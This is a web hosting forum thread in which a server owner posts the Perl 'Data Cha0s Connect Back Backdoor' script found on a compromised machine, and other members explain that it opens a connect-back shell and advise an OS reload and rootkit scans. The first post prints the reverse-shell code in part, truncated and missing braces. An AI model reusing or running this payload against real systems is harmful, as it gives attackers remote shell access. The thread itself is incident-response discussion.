Results 1 to 7 of 7
  1. #1

    [URGENT] Data Cha0s Connect Back Backdoor


    Since about 1 hour my server can not be reached anymore (websites, ...) from the outside world. All ports seem to be closed except port 22.

    I have found the the following exploit has been executed once on my server:
    "Data Cha0s Connect Back Backdoor"

    1. What does this script do?
    2. and how can I UNDO this script so my websites became available again?

    I have found this script was executed like this: perl 80

    Thanks for helping
    use Socket;
    print "Data Cha0s Connect Back Backdoor\n\n";
    if (!$ARGV[0]) {
    printf "Usage: $0 [Host] <Port>\n";
    print "[*] Dumping Arguments\n";
    $host = $ARGV[0];
    $port = 80;
    if ($ARGV[1]) {
    $port = $ARGV[1];
    print "[*] Connecting...\n";
    $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
    my $target = inet_aton($host);
    if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("Unable to Connect\n");
    print "[*] Spawning Shell\n";
    if (!fork( )) {
    exec {'/bin/sh'} '-bash' . "\0" x 4;
    print "[*] Datached\n\n";

  2. #2
    Join Date
    Jun 2003
    Your machine has had a root comprimise. The best (and right thing) to do is get the server reloaded and restore your data from backup. Also hire someone to secure it

    Russ Foster - Industry Curmudgeon

  3. #3
    I think a full reinstall will be necessary.

    But before doing this, do
    you think it's possible to undo what the script has done (considering
    that nothing else was done to the system). This script looks easy but unfortunately I don't know perl.

  4. #4
    Join Date
    Apr 2003
    It allowed the hacker to get a shell on your system. It is still fully possible your system was not rooted IF your system was updated. The important thing is running the latest kernel. If you have an older kernel it is highly possible you were rooted. Even if you are running the latest kernel it is possible.

    I would first off change the ssh port then set the firewall to block all ports but ssh. From there run rkhunter and see what you can find. Since you are having trouble with other services it sounds like you were rooted.
    John W, CISSP, C|EH
    MS Information Security and Assurance - Server Administration and Security - Managed VPS and Dedicated Servers with VIP Service

  5. #5
    Join Date
    Mar 2003
    California USA
    normally if they used the back connect firewall, its because ingress filtering was enabled and they got in though open egress filtering. I would run chkrootkit and rkhunter and seen what happened. You cant know what they did for sure just by looking at that script. If the server is indeed rooted YOU NEED AN OS RELOAD. Dont try to clean it.
    Steven Ciaburri | Proactive Linux Server Management -
    Managed Servers (AS62710), Server Management, and Security Auditing.

  6. #6
    Join Date
    Sep 2002
    Top Secret
    I agree with Steve on this one. Get an OS reload. It looks like your server has been compromised, which means that anything could be happening, and you're extremely insecure, meaning you're a danger not only to YOUR customers but everyone online that way.

    Find out where it came from, get a reload, and then plug the hole.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Linux Problems? WHMCS Issues? +1-866-546-8914 (linux-14) or @whmcsguru on twitter!

  7. #7
    Join Date
    Oct 2003
    Long Island, New York
    Would just like to add that the script itself isn't such a big deal... all it seems to do is create a "connect-back" backdoor situation where the server would connect to the attacker, and not vice versa... this is due to your lack of egress filtering, as steve mentioned earlier. This shell allowed the attacker a shell with the same level of access as your httpd daemon. I've got a collection of these types of scripts that I've collected from various admin jobs and from the output on my IDS.

    You were actually compromised due to something else... usually an insecure kernel version, or something else quite prone to a local root compromise. - Business Web Hosting Solutions & Server Management Since 2003

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts